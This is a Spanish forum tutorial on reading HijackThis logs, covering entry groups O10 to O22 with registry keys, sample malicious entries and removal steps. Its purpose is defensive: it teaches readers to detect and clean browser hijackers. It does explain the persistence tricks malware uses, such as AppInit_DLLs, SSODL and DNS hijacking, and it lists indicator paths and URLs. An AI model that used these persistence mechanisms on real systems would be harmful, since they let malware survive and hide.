Lo mismo que pasa en los grupos anteriores, Hijackthis no podrá borrar los archivos mencionados desde aquí, sino, qué tendrás que reiniciar y entrar en modo seguro para eliminar manualmente las carpetas y/o archivos maliciosos.

Ten cuidado, a la hora de remover estos objetos, ya qué si se eliminan de forma incorrecta, podrías perder el acceso a Internet.

Ejemplo de la Lista O10 -

Broken Internet access because of LSP provider 'spsublsp.dll' missing

Muchos escaneadores de virus empiezan a escanear virus, troyanos, etc., al nivel del Winsock. El problema es que muchos de ellos no reordenan los LSPs en el orden correcto después de borrar el LSP problemático. Esto puede causar que HijackThis vea un problema y muestre una advertencia, la cuál puede ser similar al ejemplo de arriba, aunque de hecho el Internet sigue trabajando. Deberías consultar a un experto cuando arregles estos errores. También puedes usar LSPFix para arreglar esto.
El SpyBot por lo general,  puede arreglar esto pero asegúrate de que tienes la última versión, ya que las antiguas tienen problemas.
Si no eres, un usuario muy avanzado con Hijackthis puedes utilizar una herramienta para reparar estos errores llamada: LSPFix (Descargar).
Aquí pongo una lista, para poder verificar si estas entradas son legítimas o no:
http://www.angeltowns.com/members/zupe/lsps.html

Si buscas por el menú de Herramientas >> Opciones de Internet verás la pestaña Opciones Avanzadas. Es posible que aparezca ahí un nuevo grupo de opciones agregando una entrada bajo una llave del registro.

LLave del Registro: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions

Ejemplo de la Lista O11 -

Options group: [CommonName] CommonName

Esto lo saqué del manual que leí, cito textual: “De acuerdo con Merijn, creador de HijackThis (y también de CWShredder, StartupList, etc.), sólo se conoce de la existencia de un hijacker que usa esto y es el CommonName. Si ves CommonName en la lista, puedes removerlo con seguridad. Si ves otra entrada deberías usar Google para investigar un poco.”

Llave del Registro: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins

Ejemplo de la Lista O12: Plugin for .PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll

Muchos de los plug-ins son legítimos, así que deberías investigar con Google, antes de llegar a la conclusión de borrarlo.
Uno de los más conocidos plug-ins ilegítimos es el Onflow, que tiene extensión .OFB.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Llave del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\

Ejemplo de Lista O13 - WWW. Prefix: http://ehttp.cc/?

Si estás experimentando problemas similares al problema de arriba, deberías correr CWShredder. Este programa remueve todas las variaciones conocidas de CoolWebSearch que puedan estar en tu máquina.

Si CWShredder no encuentra o arregla el problema, entonces puedes usar el HijackThis para arreglar esta entrada cuando la encuentres.

Ejemplo de Lista O14 - IERESET.INF: START_PAGE_URL=http://www.searchalot.com

En conclusión, si ves una entrada de este tipo en tu log, no siempre quiere decir que sea mala. Puede ser puesta por tí, algún administrador del equipo, lo debes dejar siempre y cuando, conozcas la dirección del archivo. Por el contrario, si la desconoses, puedes marcarla y darle Fix Checked.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

Ejemplo de Lista O15 - Trusted Zone: http://www.arwinianos.net

Entonces, si vemos alguna entrada que desconocemos su procedencia o URL, procederemos a marcarla y darle Fix Checked.

Los objetos ActiveX son programas que son descargados desde sitios web y son guardados en tu ordenador. Estos objetos están guardados por defecto en: C:\windows\Downloaded Program Files. Estos tienen una referencia en el registro por su CLSID el cuál es una cadena larga de números entre llaves {}. Existen muchos controles ActiveX legítimos como este de ejemplo, el cuál es un visor iPix.

Ejemplo de Lista O16 - DPF: (iPix ActiveX Control) - http://www.ipix.com/download/ipixx.cab

O algún Activex, para jugar algún juego online.
Muchos son legítimos, pero también lo hay para ser usado con otras intenciones.

Si ves nombres o direcciones que no reconozcas, deberías buscar en Google para ver si son o no legítimos. Si confirmas que son ilegítimas, puedes arreglarlas. Borrando los objetos ActiveX de tu computadora, no tendrás mayor problema que descargarlos nuevamente cuando entres de nuevo a la página desde donde los descargaste.
Como ya dijimos más arriba, no todos los Activex, son ilegítimos. Muchos de estos son utilizados por sitios web autorizados que permiten acceder a ciertas funciones que no se permiten sin el objeto Activex.
Por ejemplo:
Cualquier AV online, como Eset, Kaspersky necesitan de un Activex para poder ejecutarse y ver el contenido de tus ficheros para poder analizarlos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Cuando nos dirijimos a un sitio web usando un dominio, como www.hotmail.com, en lugar de una dirección IP, tu computadora usa un servidor DNS para transformar el nombre de dominio en una dirección IP parecida a 200.56.15.85. El hackeo de dominios sucede cuando el hijacker cambia los servidores DNS en tu máquina para poder apuntar tus DNS a donde ellos quieran para poder dirijirte a cualquier sitio que quieran. Agregando www.hotmail.com a sus servidores DNS, ellos pueden hacer que cuando vayas a www.hotmail.com, te redirijan al sitio de su elección, por ejemplo, un sitio que descargue más malware a tu ordenador o te infecte con algún troyano.

Ejemplo de Lista O17 - HKLM\System\CS1\Services\VxD\MSTCP: NameServer = 69.57.146.14,69.57.147.175

Si ves entradas de este tipo y no reconoces el dominio perteneciente a tu ISP o la compañía que te proporciona conexión a Internet, y los servidores DNS no pertenecen a tu ISP o compañía, entonces deberías usar HijackThis para arreglar esto.
En otro caso, podrías hacer un Whois a la dirección IP para ver a que compañía pertenecen.

Este método es usado para cambiar los controladores de protocolo estándar que tu computadora usa a otros que el hijacker proporciona. Esto permite al hijacker tomar control de ciertos canales en que tu computadora envía y recibe información.

Llaves del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter

HijackThis primero lee la sección de protocolos del registro en busca de protocolos no-estándar. Cuando encuentra uno muestra el CLSID para mayor información así como la ruta del archivo.

Ejemplo de Lista O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll

Los más comunes que hacen esto son CoolWebSearch, Related Links, y Lop.com. Si ves estos nombres puedes arreglarlos con HijackThis.
Usa Google para investigar si los archivos son legítimos. También puedes usar la Lista O18 de Castlecops como apoyo para verificar los archivos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Una hoja de estilo es una plantilla para saber cómo mostrar las capas, colores y fuentes que se visualizan en una página HTML. Este tipo de hijacking sobreescribe la hoja de estilo por defecto, la cuál fue diseñada para ayudar a los usuarios, y provoca largas cantidades de pop-ups (ventanas emergentes de publicidad) ya sea para causar SPAM, molestia o una lentitud potencial.

Llaves del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\: User Stylesheets

Ejemplo de Lista O19 - User style sheet: c:\WINDOWS\Java\my.css

Por lo general, estas entradas se pueden reparar con Hijackthis sin mayores problemas.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

El valor del registro AppInitDLLs contiene una lista de dlls (librerías) que se cargarán cuando user32.dll está cargando. Muchos ejecutables de Windows usan la librería user32.dll, lo que significa que cualquier DLL que esté listada en la llave del registro AppInit_DLLs también será cargada. Esto hace que sea muy difícil remover la DLL ya que estará cargando con múltiples procesos, muchos de los cuales no pueden ser detenidos sin causar inestabilidad en el sistema. El archivo user32.dll también es usado en procesos que inician automáticamente por el sistema cuando tu te logueas. Esto significa que los archivos cargados en el valor AppInit_DLLs serán cargados casi al inicio en la rutina de arranque de Windows permitiendo a la DLL esconderse o protegerse a sí misma antes que tengamos acceso al sistema.

Este método es conocido al ser usado por una variante de CoolWebSearch y sólo puede verse en Regedit dando click derecho sobre el valor, y seleccionando Modificar dato binario. Registrar Lite , por otra parte, puede ver más fácil esta DLL.

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

Ejemplo de Lista O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll

Existen muy pocos programas legítimos que usan esta llave del registro, pero debes proceder con cuidado cuando decidas borrar los archivos que son listados aquí. Usa Google o alguna lista(Lista de Startups de Bleeping Computer) como soporte para investigar si los archivos son legítimos o no.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Esta llave contiene valores similares a los de la llave Run del registro. La diferencia es que ésa en lugar de apuntar al archivo mismo, ésta señala al InProcServer del CLSID, el cuál contiene la información acerca del DLL en particular que se está usando.

Los archivos bajo esta llave son cargados automáticamente por Explorer.exe cuando tu computadora inicia. Como Explorer.exe es la shell para tu computadora, ésta siempre se va a cargar, así también cargando los archivos bajo esta llave. Estos archivos son por lo tanto cargados tempranamente en el proceso de inicio antes de que ocurra cualquier intervención humana.

Un hijacker que usa el método puede reconocerse por las siguientes entradas:

Ejemplo de Lista: R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = C:\WINDOWS\secure.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = C:\WINDOWS\secure.html

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

Ejemplo de Lista O21 - SSODL: System - - C:\WINDOWS\system32\system32.dll

Hijackthis, tiene una base de datos interna que ya reconoce las aplicaciones legítimas y no las lista en el log, asique, cualquier entrada O21 que aparezca ya la puedes considerar sospechosa.
Puedes usar Google para consultar sobre esa DLL o esta lista de DLL’s:
Lista de DLL’s del grupo O21 de Bleeping Computer.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

Llave del Registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler

Ejemplo de Lista O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll

Ojo! a la hora de borrar estas entradas, ya que algunas son legítimas.Puedes usar Google para buscar más información o ayudarte con esta lista:
Lista de Bleeping Computer O22.

HijackThis borrará el valor asociado del SharedTaskScheduler con esta entrada, pero no borrará el CLSID al que apunta ni el archivo al que apunta el Inprocserver32 de CLSID. Por lo que, como en los grupos anteriores, deberemos entrar en modo seguro y borrarlo manualmente con Unlocker u otro programa similar.

HECHO POR: Zinc

Fuente: http://foro.elhacker.net/seguridad/iquestcomo_leer_un_log_de_hijackthis_y_corregir_posibles_problemas-t188566.0.html